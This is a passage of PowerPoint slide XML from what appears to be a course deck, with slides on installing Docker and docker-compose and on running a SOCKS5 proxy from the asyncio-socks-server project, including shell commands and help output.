              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>docker-compose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1BA85BB-3213-4DC1-96B9-A4E5EDB40CE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455820" y="3135739"/>
            <a:ext cx="10539663" cy="224676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apt update</a:t>
            </a:r>
          </a:p>
          <a:p>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apt install docker.io –y</a:t>
            </a:r>
          </a:p>
          <a:p>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curl -L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"https://github.com/docker/compose/releases/download/1.29.2/docker-compose-$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -s)-$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -m)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -o /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/docker-compose</a:t>
            </a:r>
          </a:p>
          <a:p>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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/docker-compose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>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usermod</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aG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F44747"/>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whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400"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0700A7E1-9D97-4BE9-9A04-C03F6E8BE3CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1172177" y="5800252"/>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sz="1800" dirty="0"/>
              <a:t>Then reboot the machine so that group changes are updated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07ADCB18-BE12-4E57-9A23-3AC80130EB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455820" y="6322633"/>
            <a:ext cx="10539663"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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> reboot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7D89F8-F889-411C-9C30-2145FA76744C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9027085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Instead of proxying each service individually, we can proxy all traffic to any port through a single proxy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Graphical user interface, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E09BDE53-76EB-4046-9891-F6693B000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57" y="2266242"/>
            <a:ext cx="7042013" cy="4335083"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF97E8D-B32F-4900-B070-2E5EB79CB0BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22516557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Instead of proxying each service individually, we can proxy all traffic to any port through a single proxy.</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ADE9F200-69EC-4DC9-A2FD-C52835CEB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790" y="2245400"/>
            <a:ext cx="7202906" cy="4440147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30CBF430-E9B8-409B-A09E-327C764579D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3844799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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SOCKS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> can proxy traffic to any target without specifying a destination port/host.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>SOCKS5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> also adds support for authentication to the proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, application&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE9F200-69EC-4DC9-A2FD-C52835CEB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0200" y="2602832"/>
            <a:ext cx="6164180" cy="3449052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B36014EE-C1A7-459A-845C-3AAB8BDE7139}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="2857950"/>
            <a:ext cx="4009575"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Luckily, there’s an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> of socks5 protocol that we can use to proxy our traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We’ll download the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>source code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and write a little script to start the proxy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C63938C-DC16-4F24-9A44-8800C243DE13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16372873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You can either download the zip code from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>GitHub repo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, or alternatively, you can use git to clone source code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2482C708-A96C-4EBF-B86C-82D8CE6932DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752595" y="2688291"/>
            <a:ext cx="9372047" cy="144655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a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ git clone https://github.com/Amaindex/asyncio-socks-server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Cloning into 'asyncio-socks-server'...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote: Enumerating objects: 282, done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote: Counting objects: 100% (282/282), done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote: Compressing objects: 100% (182/182), done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote: Total 282 (delta 172), reused 193 (delta 92), pack-reused 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Receiving objects: 100% (282/282), 68.09 KiB | 13.62 MiB/s, done.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Resolving deltas: 100% (172/172), done.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38ACA419-3800-49B4-B9C4-4C2C322377D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188067" y="4220529"/>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we’ll enter the project’s folder, and create a file named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>my_socks5_proxy.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24246459-7B0A-47BA-A4D3-E8D8125D50A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752595" y="4745691"/>
            <a:ext cx="9372047" cy="76944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a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a: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asyncio_socks_server.__main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</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__name__</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"__main__"</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main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Slide Number Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2485F4-0AAF-481E-B23C-BE05DF43D410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4270343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the created file, we get the following output:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2482C708-A96C-4EBF-B86C-82D8CE6932DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752594" y="2279179"/>
            <a:ext cx="937204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a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>~/asyncio-socks-server$ python my_socks5_proxy.py -h</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usage: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asyncio_socks_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [-h] [-v] [-H HOST] [-P PORT] [-A METHOD] [--access-log] [--debug] [--strict]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                            [--env-prefix ENV_PREFIX] [--config PATH]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>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optional arguments:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
